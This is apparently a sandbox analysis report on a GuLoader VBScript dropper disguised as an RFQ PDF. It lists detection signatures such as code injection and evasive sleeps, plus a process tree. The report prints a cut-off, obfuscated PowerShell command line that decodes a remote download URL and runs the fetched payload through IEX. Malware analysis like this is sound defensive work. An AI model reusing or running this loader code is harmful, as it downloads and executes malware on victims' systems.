Edit tour
Windows
Analysis Report
RFQ_24196MR_PDF.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6892 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\RFQ_2 4196MR_PDF .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Tnknin gen Acnes udgangsstr m Lakferni sens Svige fuldere Po plesie Non pardoning #>;$Harleq uinic9='Fa ineant';<# Binit Reve ree Opnaae s #>;$Stoo led=$Anaps tiske+$hos t.UI; func tion Katab olize($bev aringernes ){If ($Sto oled) {$Pr ocenttegne t++;}$Reas signments= $Diamantsl iberes+$be varingerne s.'Length' -$Procentt egnet; for ( $Forheks elserne=5; $Forheksel serne -lt $Reassignm ents;$Forh ekselserne +=6){$Proe mpiricist= $Forheksel serne;$Ove rsigstabel ler+=$beva ringernes[ $Forheksel serne];$Ud slg120='Te lepatis';} $Oversigst abeller;}f unction Sa lvierne($D edentition ){ . ( $Tdlens) ( $Dedentiti on);}$Disk ettestrels erne=Katab olize 'The saMPa mio dru zVoldg iBud.ilBur gulSpdetaK best/Mi nn ';$Klaner ='Forda[Sh ri NFem ie IndtjTFadd l.tantas a kebeGe atR watc,VPo t aITotnecMo nureDativp GenfuOFibe ri UnsiNHe n.iTCoticm Ho.ltA Unc oN F.rsALr ke GSpnd E DosshROmga a]Eskim:Co t a:Pose S Unde.e Kvi tCProg UO, erirD ughI RundetF rs dyL.ksePOd iumrRet.ro HippeTIn u lOM rtyC n onsoKnaldl Nonne vuls =Bior ';$D iskettestr elserne+=K atabolize 'Doxog5Str in.Wittd0C ardi Rejs( genneWTril li FortnCo udrd togeo Unc mwUnso osRekla Ba udrNTr.glT Spag Prak t1Tel,s0 A nsk.Afdan0 uber; Ob. c AflaaWSs eriWhirln Patos6 Oil .4 macr;Vr tdy Str fx Ecba 6Velg e4Infri;De cid FlyvrK ompovA,jac : Besc1Kli pd3Indsp1F remt.Gensk 0boome)reh ea DesenGC yanoePre o cKlaphk Me ioGlams/U sco2Gri l 0A mbe1o.s kr0.rimi0. elik1Humrs 0Pseud1Cam pe SlvbrFC omi i T an rIllege Jo rdf xpreoS lavixAntom /Tendr1Unr c3Tipol1 Funk.Aflir 0aut s ';$ Klaner+=' Mosa[ Di g NUnknoEGon apTDistr.T ypifsSchis EVels.cRan sauPa narB evikIFirbl tMonadY i plpAppenRh e aaOUdmaa t VocaOise nkc Fingop reuslPerlo T EnhuYSno haPD milEP ,nti] Attr ';$Udekam penes=Kata bolize ' S ,lvU DispS ProgrE Sko lrTeglt-Tu b pAbeklaG ParasEMask oNIrgrnTkr imi ';$Ach inese=Kata bolize 'Mi crohSlaant Musett Neo ppSvlges S tra:Beher/ Varme/Pulv ed acrorAf drai Mumiv likke Lde r.usandgFa irboTr ldo ConvogSor klAdskieVi ndi. befcF yldooEvang mPha,a/Ano maupron cR andp?Drivh e strax Re sopF lskoH uastrFatti tKunde=Sok kedFornro, eathwHalak ncykell Fo ndo em haR astld Chl &Tarwoi Pi radCallb=i ,dit1hotto DSkrifRAar pexSailo- Pres4 andf -Haan skam m,5Sn wb-D iale4 Revn 2ExedreMar s,c Over5o stre5,emer vR.gnfnFri d F SukkOo ver O Fr s k BagtcDib blNDemagRB odegWBra,d qStrom_Maj eux Sen.p A thfVende 4,ncureOr el ';$Unpr incipal=Ka tabolize ' Halv> avl ';$Tdlens =Kataboliz e 'TopkiIF od.aEStr,t XLogom ';$ Slideproof ='Nkke';$K laner+='Va es.:Anstu: SkrivT rai nLE uiasDu vet1Promi2 Empa. ';$s ysker='\So lidifiable .Sch';Salv ierne (Kat abolize 'Q